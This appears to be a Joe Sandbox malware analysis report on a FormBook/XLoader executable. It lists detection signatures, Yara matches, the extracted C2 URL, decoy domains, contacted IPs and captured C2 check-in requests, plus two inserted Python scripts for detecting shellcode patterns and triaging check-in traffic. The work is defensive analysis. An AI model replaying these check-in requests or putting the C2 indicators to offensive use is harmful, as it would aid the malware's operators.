Windows Analysis Report: scan files 15-9-21.exe

Overview

General Information

Sample Name: scan files 15-9-21.exe
Analysis ID: 483582
MD5: 00e32d8a2cbd54e967bfc8f512086ecf
SHA1: f51b70a2117089a87b0daf6f179a3b492acf58f2
SHA256: 36d409b61a0f456cb3e593338ebf2db1fae38ea645392d98030bc7e7a0eb9a3c
Tags: exe, Formbook, xloader
Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lifewithbriana.com/mej0/"], "decoy": ["mtxs8.com", "quickskiplondon.com", "sltplanner.com", "generatedate.com", "amsinspections.com", "tomrings.com", "109friends.com", "freelovereading.com", "avalapartners.com", "nordiqueluxury.com", "inmbex.com", "everybankatm.com", "bo1899.com", "ashymeadow.com", "pubgm-chickendinner.com", "takudolunch.com", "carlagremiao.com", "actonetheatre.com", "wemhealth.com", "khasomat.net", "lartiqueusa.com", "singularity.institute", "ashsgx567d.com", "sequoiaparts.net", "ujriksalead.com", "ag99.xyz", "isabeltimon.com", "bijyo-topic.site", "homefuels.energy", "2ofakinddesigns.com", "iggglobal.com", "ravenlightproductions.com", "magicaltransform.com", "2936vaquero.com", "essentialme.network", "thebrathouse.info", "tecstrong.net", "ayulaksmi.com", "maximebazerque.com", "bankdj.com", "pizzaoff.com", "eastcohemp.com", "acordolimpo.com", "mediacpstreamchile.com", "wholesalefleuerdelis.com", "chuangyuanfz.com", "getcenteredwithclay.com", "retaboo.com", "ikonicboatcharters.com", "parakhonskiy.com", "tropical-therapy.com", "metropitstop.com", "municipiodeanton.net", "valorplanodesaudemaranhao.info", "alibabakanaat.com", "creditsoptionsnow.com", "arabgerman.digital", "webspazio.com", "sunsyncindia.com", "jlsolutionspty.com", "almightyamerican.com", "nadirshirts.com", "gdxinmu.com", "postcaremedical.com"]}
Multi AV Scanner detection for submitted file
Source: scan files 15-9-21.exe Virustotal: Detection: 29%
Source: scan files 15-9-21.exe ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: scan files 15-9-21.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: scan files 15-9-21.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: scan files 15-9-21.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 4x nop then pop ebx 2_2_00406A97
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 4x nop then pop edi 2_2_00415692
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop ebx 13_2_00876A97
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop edi 13_2_00885692
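The "4x nop then pop ebx" entries above come from a byte-level heuristic: a run of single-byte 0x90 instructions immediately followed by a one-byte pop r32 (opcodes 0x58 to 0x5F), a shape compilers rarely emit but padded or hand-written shellcode often does. The scanner below is an added example, not part of the Joe Sandbox report or its engine; it reproduces that heuristic over a constructed byte string (the sample bytes and the 0x401000 base address are made up for the demonstration and are not taken from the analysed file).

```python
# x86 single-byte NOP and the one-byte "pop r32" opcode family.
NOP = 0x90
POP_R32 = {0x58: "eax", 0x59: "ecx", 0x5A: "edx", 0x5B: "ebx",
           0x5C: "esp", 0x5D: "ebp", 0x5E: "esi", 0x5F: "edi"}

# Constructed test bytes (not from the sample): three runs of nops, only two of
# which are followed by a pop and long enough to count.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                          # push ebp; mov ebp, esp (ordinary prologue)
    0x90, 0x90, 0x90, 0x5B,                    # 3x nop then pop ebx: below threshold, ignored
    0x33, 0xC0,                                # xor eax, eax
    0x90, 0x90, 0x90, 0x90, 0x5B,              # 4x nop then pop ebx: reported
    0xC3,                                      # ret
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x5F,  # 6x nop then pop edi: reported
    0x90, 0x90, 0x90, 0x90, 0xC3,              # 4x nop then ret: no pop, ignored
])


def find_nop_then_pop(code, base=0, min_nops=4):
    """Return (address, nop_count, register) for every maximal run of at least
    min_nops 0x90 bytes that is immediately followed by a one-byte pop r32.
    A run of five nops before a pop is reported once, with count 5."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:      # consume the whole nop run
            i += 1
        run = i - start
        if run >= min_nops and i < n and code[i] in POP_R32:
            hits.append((base + start, run, POP_R32[code[i]]))
    return hits


def describe(hits):
    """Render hits in the same wording the report uses, e.g. '4x nop then pop ebx at 00401009'."""
    return ["%dx nop then pop %s at %08X" % (run, reg, addr) for addr, run, reg in hits]


if __name__ == "__main__":
    for line in describe(find_nop_then_pop(SAMPLE, base=0x401000)):
        print(line)
```

The two hits in the report would also be caught by the YARA byte strings { 90 90 90 90 5B } and { 90 90 90 90 5F }. Either form is a weak indicator on its own, since compilers also emit 0x90 for alignment padding, which is why the report words the signature as "likely shell or obfuscated code" and the verdict rests on the injection and Yara evidence rather than on this alone.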

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49777 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49779 -> 35.237.65.63:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49785 -> 99.83.154.118:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.valorplanodesaudemaranhao.info
Source: C:\Windows\explorer.exe Network Connect: 172.67.196.84 80
Source: C:\Windows\explorer.exe Domain query: www.everybankatm.com
Source: C:\Windows\explorer.exe Domain query: www.nordiqueluxury.com
Source: C:\Windows\explorer.exe Domain query: www.quickskiplondon.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe Domain query: www.singularity.institute
Source: C:\Windows\explorer.exe Domain query: www.parakhonskiy.com
Source: C:\Windows\explorer.exe Domain query: www.lifewithbriana.com
Source: C:\Windows\explorer.exe Network Connect: 35.237.65.63 80
Source: C:\Windows\explorer.exe Network Connect: 84.34.147.60 80
Source: C:\Windows\explorer.exe Domain query: www.municipiodeanton.net
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lifewithbriana.com/mej0/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: TSF-IP-CORETeliaFinlandOyjEU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1
    Host: www.nordiqueluxury.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1
    Host: www.valorplanodesaudemaranhao.info
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1
    Host: www.municipiodeanton.net
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1
    Host: www.quickskiplondon.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /mej0/?ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN HTTP/1.1
    Host: www.singularity.institute
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: explorer.exe, 00000003.00000000.270733342.000000000686B000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.parakhonskiy.com
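The check-ins captured above all have the same shape: a GET to the short path /mej0/ with one long base64-like query value and one short alphanumeric one, a Host header, Connection: close, no User-Agent, and a 7-byte null body. The Host rotates through domains from the config's "decoy" list while the only real C2 in the config is www.lifewithbriana.com/mej0/, and the path used against the decoys is the same as the C2 path. The script below is an added example, not part of the Joe Sandbox report: it parses requests of the form shown on this page, labels each Host against the extracted configuration, and flags the check-in shape. The five request strings are copied from the report (with header separators restored); the parsing regexes, the threshold values, the label names and the benign contrast request are this example's own assumptions.

```python
import re

# Configuration extracted in the report: the C2 entry verbatim, the decoy list
# cut down to the domains that appear in the captured traffic (the full list has 64).
FORMBOOK_CONFIG = {
    "C2 list": ["www.lifewithbriana.com/mej0/"],
    "decoy": [
        "nordiqueluxury.com", "valorplanodesaudemaranhao.info", "municipiodeanton.net",
        "quickskiplondon.com", "singularity.institute", "parakhonskiy.com", "everybankatm.com",
    ],
}

_NULL_BODY = "\x00" * 7  # the "Data Raw: 00 00 00 00 00 00 00" body shown in the report


def _checkin(query, host):
    """Rebuild one captured request with CRLF header separators restored."""
    return "GET /mej0/?%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n%s" % (query, host, _NULL_BODY)


# The five check-ins from the report; query strings copied as shown there.
REPORTED_REQUESTS = [
    _checkin("ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN", "www.nordiqueluxury.com"),
    _checkin("ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN", "www.valorplanodesaudemaranhao.info"),
    _checkin("ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN", "www.municipiodeanton.net"),
    _checkin("ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN", "www.quickskiplondon.com"),
    _checkin("ZTSpa=RzUuUNIP5w6/jz6u/3nPHL71H0tFSqxvyYqd1E+XwjP7nDbVm/SW3vaLh5vwv8/S3nR/rxiqcA==&vP=JtCxKN", "www.singularity.institute"),
]

# Constructed benign request for contrast; not from the report.
BENIGN_REQUEST = ("GET /api/v1/status?format=json HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n")

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")   # long token, e.g. the ZTSpa value
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{2,12}$")        # short token, e.g. vP=JtCxKN


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, undecoded query params, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE_RE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    path, _, query = m.group("target").partition("?")
    # Values stay undecoded on purpose: '+' and '/' are part of the base64-like token.
    params = dict(p.partition("=")[::2] for p in query.split("&") if p)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group("method"), "path": path, "params": params,
            "headers": headers, "body": body}


def _bare_host(host):
    host = host.lower().strip()
    return host[4:] if host.startswith("www.") else host


def classify_host(host, config=FORMBOOK_CONFIG):
    """Label a Host header against the extracted config: 'c2', 'decoy' or 'unknown'."""
    c2_hosts = {_bare_host(u.split("/", 1)[0]) for u in config["C2 list"]}
    decoys = {_bare_host(d) for d in config["decoy"]}
    h = _bare_host(host)
    if h in c2_hosts:
        return "c2"
    return "decoy" if h in decoys else "unknown"


def c2_paths(config=FORMBOOK_CONFIG):
    """URI paths of the real C2 entries, e.g. {'/mej0/'}."""
    return {"/" + u.split("/", 1)[1] for u in config["C2 list"] if "/" in u}


def looks_like_formbook_checkin(req):
    """Heuristic derived from the requests on this page (this example's own thresholds):
    GET to a short single-segment path, exactly two query params (one long base64-like,
    one short alphanumeric), Connection: close and no User-Agent header."""
    if req["method"] != "GET" or not re.fullmatch(r"/[A-Za-z0-9]{2,8}/", req["path"]):
        return False
    values = list(req["params"].values())
    if len(values) != 2:
        return False
    if not (any(BASE64ISH.match(v) for v in values) and any(SHORT_TOKEN.match(v) for v in values)):
        return False
    h = req["headers"]
    return h.get("connection", "").lower() == "close" and "user-agent" not in h


def triage(raw_requests, config=FORMBOOK_CONFIG):
    """One finding per request: host, config label, check-in shape, and whether the
    path equals a configured C2 path (FormBook reuses it against the decoys)."""
    paths = c2_paths(config)
    findings = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        findings.append({"host": host, "label": classify_host(host, config),
                         "checkin_shape": looks_like_formbook_checkin(req),
                         "c2_path": req["path"] in paths})
    return findings


if __name__ == "__main__":
    for finding in triage(REPORTED_REQUESTS + [BENIGN_REQUEST]):
        print(finding)
```

Run against the captured traffic, every one of the five requests is labelled decoy with the check-in shape and the C2 path; none of them reaches the real C2, which is the point of the decoy list: a blocklist built only from observed destinations misses www.lifewithbriana.com, while the extracted configuration names it directly.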

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: scan files 15-9-21.exe, Forms/mainForm.cs Long String: Length: 38272
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs Long String: Length: 38272
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs Long String: Length: 38272
Uses 32bit PE files
Source: scan files 15-9-21.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
